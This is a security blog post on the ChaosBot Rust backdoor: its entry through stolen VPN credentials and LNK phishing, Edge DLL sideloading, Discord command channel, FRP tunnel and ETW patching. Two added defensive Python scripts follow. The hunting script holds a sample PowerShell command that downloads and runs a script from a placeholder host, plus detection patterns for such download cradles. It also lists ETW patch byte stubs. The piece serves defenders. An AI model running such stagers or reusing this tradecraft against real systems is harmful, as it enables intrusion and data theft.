
The ChaosBot opens the Rusty Backdoor

  • Javier Conejo del Cerro
  • 13 Oct
  • 3 min read

Updated: 15 Oct

A robot sneaks through a squeaky, rusty backdoor — and this time, it’s not a metaphor. A new Rust-based backdoor dubbed ChaosBot is giving operators full remote control of compromised Windows systems. Once inside, it can execute arbitrary commands, exfiltrate files, and sustain internal access by hiding its control channel within Discord servers. Detected first in late September 2025, the malware blends sophisticated privilege abuse, credential theft, and stealthy persistence in one metallic package.


Phase 1: Entry and Initial Compromise


The attackers’ entry vector combined stolen Cisco VPN credentials and over-privileged Active Directory (AD) accounts, granting them high-level internal access from the start. In parallel, phishing campaigns distributed malicious LNK shortcuts, which when opened executed PowerShell commands to fetch and run the ChaosBot payload. These dual methods ensured flexibility: social engineering for wide reach, and credential-based infiltration for targeted internal breaches.

Once deployed, the malware began spreading laterally across corporate networks, exploiting weak credential policies and misconfigured remote execution rights. This dual entry strategy shows the attackers’ operational maturity — combining identity compromise with endpoint infection to maximize persistence and impact.


Phase 2: Implant and Execution


ChaosBot’s loader uses a DLL-sideloading technique, abusing Microsoft Edge’s legitimate binary identity_helper.exe to load a malicious library named msedge_elf.dll. This does not exploit a browser flaw, but rather leverages a trusted executable to camouflage the attack.

Once active, ChaosBot installs an FRP (Fast Reverse Proxy), establishing a covert tunnel that allows continuous access into the victim’s network without triggering common outbound alerts. The bot then registers with specific Discord accounts—notably chaos_00019 and lovebb0024—that act as its command-and-control (C2) operators. Through Discord channels, attackers can issue commands like shell, scr, download, and upload, enabling them to:

  • Execute PowerShell or shell commands remotely.

  • Capture screenshots for reconnaissance.

  • Move and exfiltrate files.

  • Deploy additional payloads or tools for deeper exploitation.

The use of Discord as C2 is strategic: it blends malicious traffic into legitimate encrypted HTTPS flows, making detection far more difficult for defenders relying on conventional anomaly-based systems.


Phase 3: Evasion and Persistence


ChaosBot incorporates advanced evasion routines. It patches Event Tracing for Windows (ETW) by altering the EtwEventWrite function, effectively blinding defenders’ telemetry. In addition, it performs virtual machine checks, comparing MAC address prefixes to detect sandbox environments like VMware or VirtualBox — a tactic that prevents security researchers from analyzing its behavior in controlled conditions.

These capabilities make ChaosBot resilient and difficult to eradicate once deployed. Its Rust-based architecture adds another layer of stealth, since Rust binaries are harder to reverse-engineer and often slip past signature-based antivirus systems. Combined with its use of common binaries and legitimate channels, ChaosBot represents a new evolution of modular, cloud-integrated backdoors.
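The ETW blinding described above can be checked for from the defender's side: if the first bytes of ntdll's EtwEventWrite have been overwritten with an early-return stub, the function silently drops every event. The snippet below is an added example, not code from the article or from any analysis of ChaosBot; the stub byte patterns are the ones commonly seen in ETW-patching malware generally (an assumption, since the article does not state which bytes ChaosBot writes), so a patch using a different stub would not be caught. The live read uses ctypes and only works on Windows; the classifier itself is portable and is exercised on constructed byte strings.

```python
"""Heuristic check for an in-memory patch of ntdll!EtwEventWrite.
Added example: classifies the function's first bytes against the early-return
stubs commonly written over a function prologue to neutralise ETW.
"""
import ctypes
import sys

# Early-return stubs seen in ETW-patching malware (assumed list, not from the
# article). Each makes EtwEventWrite return without emitting the event.
PATCH_STUBS = (
    b"\xC3",                      # ret
    b"\x33\xC0\xC3",              # xor eax, eax ; ret
    b"\x31\xC0\xC3",              # xor eax, eax ; ret  (alternate encoding)
    b"\xB8\x00\x00\x00\x00\xC3",  # mov eax, 0 ; ret
)


def classify_prologue(first_bytes: bytes) -> str:
    """Return 'patched' if the bytes start with a known stub, else 'no_known_stub'.
    A negative result is not proof of integrity: it only means none of the
    listed stubs is present."""
    for stub in PATCH_STUBS:
        if first_bytes.startswith(stub):
            return "patched"
    return "no_known_stub"


def read_live_prologue(length: int = 8) -> bytes:
    """Read the first bytes of EtwEventWrite in the current process (Windows only)."""
    if sys.platform != "win32":
        raise OSError("live read of ntdll requires Windows")
    ntdll = ctypes.WinDLL("ntdll")
    address = ctypes.cast(ntdll.EtwEventWrite, ctypes.c_void_p).value
    return ctypes.string_at(address, length)


if __name__ == "__main__":
    # Constructed inputs: a plausible untouched x64 prologue and a 'ret' patch.
    print(classify_prologue(b"\x4C\x8B\xDC\x48\x83\xEC\x58"))  # no_known_stub
    print(classify_prologue(b"\xC3\xCC\xCC\xCC"))              # patched
    if sys.platform == "win32":
        print(classify_prologue(read_live_prologue()))
```

Run inside a process you suspect has been tampered with (or from an EDR agent's own process) to get a cheap integrity signal; a more robust version compares the live bytes against the same export in the ntdll.dll image on disk rather than against a fixed stub list.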


Measures to Fend Off the Bot


Organizations should assume exposure and act decisively:

  • Revoke and rotate all compromised or over-privileged VPN and AD credentials.

  • Block LNK→PowerShell execution chains at mail and network gateways.

  • Hunt for indicators such as msedge_elf.dll and identity_helper.exe running from outside Edge's install directory or unsigned (both names exist legitimately inside a genuine Edge installation), FRP tunnels, and Discord C2 traffic patterns.

  • Disable DLL sideloading paths where possible to reduce binary abuse.

  • Harden endpoints by enforcing least privilege and credential segmentation.

  • Enable behavioral EDR detections for lateral movement, proxy tunnels, and anomalous PowerShell execution.

  • Monitor Discord traffic within corporate environments and restrict external communication where unnecessary.
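The hunting and monitoring items above, together with the sideloading and Discord C2 behaviour from Phase 2, translate into a handful of detection rules. The script below is an added example written for this page, not the article's own material or a published detection from any vendor. It assumes Sysmon-style event fields (EventID 1 process creation, 7 image load, 3 network connection), that a double-clicked LNK surfaces as PowerShell whose parent is explorer.exe, and that the FRP client keeps its default binary name frpc.exe; the events at the bottom are constructed samples, and the URL in them is a placeholder.

```python
"""Hunting rules for ChaosBot-style activity over Sysmon-like events.
Added example; events are constructed samples, field names follow Sysmon
conventions as an assumption."""
import re
from pathlib import PureWindowsPath

# Where Microsoft Edge legitimately keeps identity_helper.exe and msedge_elf.dll.
EDGE_INSTALL_DIRS = (
    r"c:\program files (x86)\microsoft\edge\application",
    r"c:\program files\microsoft\edge\application",
)
DISCORD_DOMAINS = ("discord.com", "discordapp.com", "discord.gg")
# Processes expected to reach Discord; anything else talking to it is worth a look.
DISCORD_EXPECTED_IMAGES = {"msedge.exe", "chrome.exe", "firefox.exe", "discord.exe"}
# Download-and-execute idioms typical of an LNK -> PowerShell stager.
STAGER_PATTERN = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|downloadstring|invoke-webrequest|\biwr\b|\biex\b|frombase64string)",
    re.IGNORECASE,
)


def _name(path):
    return PureWindowsPath(path).name.lower()


def _in_edge_install_dir(path):
    return str(PureWindowsPath(path).parent).lower().startswith(EDGE_INSTALL_DIRS)


def rule_edge_sideload(ev):
    """Event 7: identity_helper.exe loads msedge_elf.dll from outside Edge's
    install directory, or unsigned. The genuine pair lives inside it, signed."""
    if ev.get("EventID") != 7 or _name(ev["Image"]) != "identity_helper.exe":
        return None
    if _name(ev["ImageLoaded"]) != "msedge_elf.dll":
        return None
    signed = ev.get("Signed", "false").lower() == "true"
    if signed and _in_edge_install_dir(ev["ImageLoaded"]):
        return None
    return "edge_dll_sideload"


def rule_lnk_powershell(ev):
    """Event 1: PowerShell spawned by explorer.exe (how a double-clicked LNK
    launches) with a download cradle on its command line."""
    if ev.get("EventID") != 1 or _name(ev["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    if _name(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    return "lnk_powershell_stager" if STAGER_PATTERN.search(ev.get("CommandLine", "")) else None


def rule_discord_c2(ev):
    """Event 3: something other than a browser or the Discord client reaching Discord."""
    if ev.get("EventID") != 3:
        return None
    host = ev.get("DestinationHostname", "").lower()
    if not any(host == d or host.endswith("." + d) for d in DISCORD_DOMAINS):
        return None
    return None if _name(ev["Image"]) in DISCORD_EXPECTED_IMAGES else "discord_c2_unexpected_process"


def rule_frp_client(ev):
    """Event 1: the FRP client starting. frpc.exe is its default name (assumption);
    OriginalFileName from the PE version resource survives a rename, the path does not."""
    if ev.get("EventID") != 1:
        return None
    names = {_name(ev["Image"]), ev.get("OriginalFileName", "").lower()}
    return "frp_tunnel_client" if "frpc.exe" in names else None


RULES = (rule_edge_sideload, rule_lnk_powershell, rule_discord_c2, rule_frp_client)


def hunt(events):
    """Return (rule_name, event_index) for every event that matches a rule."""
    hits = []
    for index, ev in enumerate(events):
        for rule in RULES:
            tag = rule(ev)
            if tag:
                hits.append((tag, index))
    return hits


# Constructed sample events: index 0, 3 and 5 are benign; 1, 2, 4 and 6 should fire.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\1.0.0.0\identity_helper.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\1.0.0.0\msedge_elf.dll", "Signed": "true"},
    {"EventID": 7, "Image": r"C:\Users\Public\Edge\identity_helper.exe",
     "ImageLoaded": r"C:\Users\Public\Edge\msedge_elf.dll", "Signed": "false"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr http://example.invalid/stage.ps1)"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
    {"EventID": 3, "Image": r"C:\Users\Public\Edge\identity_helper.exe",
     "DestinationHostname": "gateway.discord.gg", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Users\alice\AppData\Local\Discord\app-1.0.0\Discord.exe",
     "DestinationHostname": "gateway.discord.gg", "DestinationPort": 443},
    {"EventID": 1, "ParentImage": r"C:\Users\Public\Edge\identity_helper.exe",
     "Image": r"C:\Users\Public\frpc.exe", "OriginalFileName": "frpc.exe",
     "CommandLine": "frpc.exe -c frpc.toml"},
]

if __name__ == "__main__":
    for tag, index in hunt(SAMPLE_EVENTS):
        print(f"[{tag}] event {index}: {SAMPLE_EVENTS[index]['Image']}")
```

The sideload rule deliberately keys on location and signature rather than on the file names alone, because a genuine Edge install ships both identity_helper.exe and msedge_elf.dll; alerting on the names by themselves would page on every workstation. The Discord rule is an allow-list of expected talkers, so tune DISCORD_EXPECTED_IMAGES to what your estate actually runs before deploying it.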


The arrival of ChaosBot underscores the rising sophistication of Rust-based malware and the blending of corporate credential abuse with cloud-native communication platforms. By abusing legitimate binaries and collaboration tools, attackers effectively turn trusted digital infrastructure into covert command channels. The campaign reminds defenders that the modern enterprise perimeter isn’t just at the firewall — it’s everywhere trust resides, from user credentials to chat apps.



Source: The Hacker News


 
 
 
